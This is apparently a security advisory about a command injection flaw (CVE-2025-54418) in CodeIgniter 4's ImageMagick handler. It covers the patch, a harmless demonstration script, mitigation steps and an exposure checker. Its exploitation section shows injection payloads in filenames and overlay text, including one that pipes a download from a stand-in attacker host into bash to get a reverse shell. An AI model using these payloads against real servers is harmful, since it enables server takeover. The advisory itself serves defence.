Feb 27, 2026 · 5 min read
Critical RCE in CodeIgniter 4's ImageMagick integration. Attackers can inject shell commands via image filenames or text parameters. Update to v4.6.2 immediately or switch to the GD image handler.
A critical OS command injection vulnerability exists in the ImageMagick handler of CodeIgniter 4 versions prior to 4.6.2. The flaw stems from insecure shell command construction when processing image files, allowing unauthenticated remote attackers to execute arbitrary system commands via crafted filenames or text annotations. Successful exploitation results in full server compromise.
CodeIgniter 4, a popular PHP web application framework, provides an image manipulation library that supports multiple handlers, including GD (using PHP's gd extension in-process) and ImageMagick (invoking external binaries through the shell). CVE-2025-54418 identifies a critical flaw in the ImageMagickHandler class.
When configured to use ImageMagick, the framework constructs shell commands to invoke binaries such as convert or mogrify. The vulnerability arises because user-controlled data—specifically source filenames, destination paths, and text annotation parameters—are concatenated directly into these command strings without adequate escaping.
This lack of sanitization allows an attacker to inject shell metacharacters. If an application using CodeIgniter 4 processes a file with a malicious name or accepts user input for image text overlays, the attacker can break out of the intended command structure and execute arbitrary operating system commands with the privileges of the web server process (typically www-data).
The root cause of CVE-2025-54418 is Improper Neutralization of Special Elements used in an OS Command (CWE-78) within system/Images/Handlers/ImageMagickHandler.php. The handler constructs command lines by wrapping variables in quotes manually rather than using PHP's built-in safety functions like escapeshellarg().
Double-Quote Injection:
In the _resize() method, variables were wrapped in double quotes ("). In Unix-like shell environments, text inside double quotes is still subject to variable expansion ($VAR) and command substitution (backticks ` or $(...)). This means that even if a filename is quoted, if it contains backticks, the shell will execute the content inside them before running the main command.
Breakout Injection:
In the _text() method, used for adding text overlays to images, parameters were concatenated with insufficient validation. This allowed attackers to use characters like semicolons (;), pipes (|), or ampersands (&) to terminate the ImageMagick command and start a new, malicious command. The framework failed to treat these inputs strictly as data, inadvertently allowing them to be interpreted as code by the system shell.
The following analysis highlights the critical changes in system/Images/Handlers/ImageMagickHandler.php. The patch replaces manual string concatenation with robust argument escaping.
Vulnerable Code (Simplified):

```php
// PRE-PATCH: Manual quoting allows injection
$cmd = $this->binaryPath . ' "' . $this->source . '" -resize ...';
// If $this->source is "image`id`.png", the shell sees:
// convert "image`id`.png" -resize ...
// Double quotes do not suppress command substitution, so the shell
// runs `id` before convert is even started.
```

Patched Code:

```php
// POST-PATCH (v4.6.2): uses escapeshellarg()
// escapeshellarg() adds single quotes around the string and quotes/escapes
// any existing single quotes, so the shell treats it purely as one literal argument.
$cmd = escapeshellcmd($this->binaryPath) . ' ' .
    escapeshellarg($this->source) . ' -resize ...';
// If $this->source is "image`id`.png", the shell sees:
// convert 'image`id`.png' -resize ...
// The backticks are treated as literal characters in the filename.
```

The fix ensures that no matter what characters are present in the filename or text options, they are treated strictly as arguments to the convert binary, effectively neutralizing the command injection vector.
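The following PHP script is an added example, not code from the CodeIgniter project or from this page. It reproduces the two quoting mistakes described above (double-quoted interpolation in the resize path, and an unescaped annotation string in the text path) beside the escapeshellarg() form used by the fix. Instead of ImageMagick it substitutes `printf '%s\n'` as the binary (an assumption made for the demonstration: it prints every argument the shell finally delivers, one per line), and it uses harmless payloads of the same shape as the exploitation scenarios on this page (`$(echo INJECTED)` in a filename, `"; echo INJECTED; echo "` in overlay text), so the effect of each quoting style is visible without ImageMagick installed. The function names are hypothetical; the page's `$this->source` and text become plain parameters. Requires PHP 7.4+ and a POSIX /bin/sh.

```php
<?php
// Added example (not CodeIgniter's code): show, at the shell-parsing level,
// why manual double quotes are unsafe and how escapeshellarg() closes both
// injection vectors. The "binary" is a stand-in that prints its argv.
declare(strict_types=1);

// Assumption: stand in for the ImageMagick binary with a program that prints
// one received argument per line, so we can see what convert would have got.
const BINARY = "printf '%s\\n'";

// PRE-PATCH style (_resize): manual double quotes. Inside "...", the shell
// still performs $VAR, `cmd` and $(cmd) expansion before running the command.
function vulnerableResizeCommand(string $source): string
{
    return BINARY . ' "' . $source . '" -resize 100x100';
}

// PRE-PATCH style (_text): the overlay text is spliced into a quoted -draw
// argument. A literal " in the text closes the quote and ; starts a new command.
function vulnerableTextCommand(string $source, string $text): string
{
    return BINARY . ' "' . $source . '" -draw "text 0,0 \'' . $text . '\'"';
}

// POST-PATCH style: every user-influenced value goes through escapeshellarg(),
// which single-quotes it and escapes embedded single quotes; the shell then
// interprets nothing inside it, whatever metacharacters it contains.
function hardenedResizeCommand(string $source): string
{
    return BINARY . ' ' . escapeshellarg($source) . ' -resize 100x100';
}

function hardenedTextCommand(string $source, string $text): string
{
    return BINARY . ' ' . escapeshellarg($source)
        . ' -draw ' . escapeshellarg("text 0,0 '" . $text . "'");
}

// Run the command through /bin/sh exactly as the handler would and return the
// output lines: one per argument the stand-in received, plus anything printed
// by commands the shell was tricked into running.
function linesProducedBy(string $cmd): array
{
    $out = (string) shell_exec($cmd);
    return array_values(array_filter(explode("\n", $out), static fn (string $l): bool => $l !== ''));
}

// Harmless payloads shaped like the two attack scenarios.
$fileName = 'image$(echo INJECTED).jpg';
$overlay  = 'Watermark"; echo INJECTED; echo "';

$demos = [
    'resize / vulnerable' => vulnerableResizeCommand($fileName),
    'resize / hardened'   => hardenedResizeCommand($fileName),
    'text / vulnerable'   => vulnerableTextCommand('source.jpg', $overlay),
    'text / hardened'     => hardenedTextCommand('source.jpg', $overlay),
];

foreach ($demos as $label => $cmd) {
    echo "== {$label} ==\n  shell command: {$cmd}\n";
    foreach (linesProducedBy($cmd) as $i => $line) {
        echo "  line[{$i}] = {$line}\n";
    }
}
```

In the vulnerable resize case the first line comes back as `imageINJECTED.jpg` (the substitution ran), and in the vulnerable text case the stand-in receives only `text 0,0 'Watermark` followed by a stand-alone `INJECTED` line from the chained command. In both hardened cases the payload arrives unchanged as a single literal argument. Note that escapeshellcmd() is not a substitute for escapeshellarg() on individual values: it neutralizes metacharacters but leaves whitespace intact, so an attacker can still split one value into several arguments (for example to smuggle in extra options).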
Exploitation of this vulnerability requires the attacker to control either the filename processed by the image handler or the text content used in an annotation. No authentication is required if the image processing endpoint is public.
Scenario 1: Malicious Filename (Command Substitution)

The attacker uploads a file whose name contains a command substitution, for example:

```text
image$(whoami).jpg
image`id`.png
```

When ImageMagickHandler constructs the command, the shell executes whoami or id before convert runs. The output might be embedded in the error log or the resulting filename, confirming RCE.

Scenario 2: Text Annotation (Command Chaining)

The attacker supplies an annotation string that closes the quoted -draw argument and chains a command:

```text
Watermark"; curl http://attacker.com/revshell | bash; echo "
```

The handler then builds a command of the form:

```text
convert source.jpg -draw "text 0,0 'Watermark"; curl ...
```

The shell interprets the quote and semicolon, breaking out of the -draw argument and executing the reverse shell payload.

The impact of CVE-2025-54418 is Critical. Successful exploitation grants the attacker the ability to execute arbitrary code on the server.
Confidentiality: Attackers can read sensitive files, including application configuration (database credentials, API keys) and user data.
Integrity: Attackers can modify application source code, inject persistent backdoors, or alter data in the database.
Availability: Attackers can delete files, crash services, or use the server as part of a botnet (e.g., for DDoS attacks), causing denial of service.
Since the web server user typically has network access, this often serves as a foothold for lateral movement within the internal network. The vulnerability is particularly dangerous because it can be triggered by seemingly harmless actions like uploading a profile picture.
The primary remediation is to upgrade the framework immediately. If an upgrade is not feasible, configuration changes can temporarily mitigate the risk.
Official Patch:
Upgrade to CodeIgniter 4.6.2 or later. This version implements escapeshellarg() across the ImageMagickHandler class to sanitize all inputs passed to the shell.
Workaround (Switch Handlers):
Change the image handling configuration to use the GD library instead of ImageMagick. The GD handler uses PHP's internal extension (gd) and does not invoke external shell commands, rendering this specific injection vector inert.
Modify app/Config/Images.php:
```php
public $defaultHandler = 'gd'; // Change from 'imagick'
```

Defense in Depth:

Harden ImageMagick's policy.xml to disable dangerous delegates and coders (e.g., MVG, MSL, EPHEMERAL, URL). Note that policy.xml only constrains what ImageMagick itself will process; it does not stop shell metacharacters from being interpreted before convert is ever invoked, so it complements the upgrade rather than replacing it.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

| Product | Affected Versions | Fixed Version |
|---|---|---|
| CodeIgniter 4 (CodeIgniter Foundation) | >= 4.0.0, < 4.6.2 | 4.6.2 |
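A quick exposure check against the affected range in the table above, added here as an example and not part of the advisory or of CodeIgniter itself: it reads the installed codeigniter4/framework version from composer.lock (Composer records each package under "packages" with "name" and "version" fields, the latter usually prefixed "v") and combines it with the $defaultHandler value from app/Config/Images.php. Exposure needs both conditions: the imagick handler selected and a version below 4.6.2. The composer.lock content below is constructed inline for the demonstration; in a real audit read it with file_get_contents() and take the handler value from the config file. Function names are hypothetical. Requires PHP 7.4+.

```php
<?php
// Added example (not CodeIgniter's code): decide whether a deployment is
// exposed to CVE-2025-54418 from composer.lock and the configured handler.
declare(strict_types=1);

const FIXED_VERSION     = '4.6.2';                 // first fixed release per the advisory
const FRAMEWORK_PACKAGE = 'codeigniter4/framework';

// Return the installed codeigniter4/framework version from composer.lock
// contents, or null if the package is not listed.
function installedFrameworkVersion(string $composerLockJson): ?string
{
    $lock = json_decode($composerLockJson, true, 512, JSON_THROW_ON_ERROR);
    foreach ($lock['packages'] ?? [] as $pkg) {
        if (($pkg['name'] ?? '') === FRAMEWORK_PACKAGE) {
            // Composer lock versions carry a "v" prefix ("v4.6.1"); strip it.
            return ltrim((string) $pkg['version'], 'v');
        }
    }
    return null;
}

// Exposed only when the ImageMagick handler is in use AND the framework
// predates the fix. Switching the handler to 'gd' removes the vector regardless
// of version; an unknown version fails closed and is reported as exposed.
function isExposed(?string $version, string $defaultHandler): bool
{
    if (strtolower($defaultHandler) !== 'imagick') {
        return false;
    }
    if ($version === null) {
        return true;
    }
    return version_compare($version, FIXED_VERSION, '<');
}

// Constructed sample composer.lock containing only the fields this check reads.
$sampleLock = json_encode([
    'packages' => [
        ['name' => 'psr/log',               'version' => '3.0.0'],
        ['name' => 'codeigniter4/framework', 'version' => 'v4.6.1'],
    ],
]);

$version = installedFrameworkVersion($sampleLock);

foreach (['imagick', 'gd'] as $handler) {
    printf(
        "framework %s, defaultHandler '%s': %s\n",
        $version ?? 'unknown',
        $handler,
        isExposed($version, $handler)
            ? 'EXPOSED (upgrade to ' . FIXED_VERSION . ' or switch to gd)'
            : 'not exposed'
    );
}
```

This checks only the configured default handler; application code that requests the ImageMagick handler explicitly from the image service is still exposed on a pre-4.6.2 framework even when $defaultHandler is 'gd', so grep the code base for such calls as part of the same audit.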
| Attribute | Detail |
|---|---|
| CWE ID | CWE-78 |
| CVSS v3.1 | 9.8 (Critical) |
| Attack Vector | Network (Image Upload/Processing) |
| Impact | Remote Code Execution (RCE) |
| EPSS Score | 0.53% |
| Exploit Status | Proof of Concept (PoC) Available |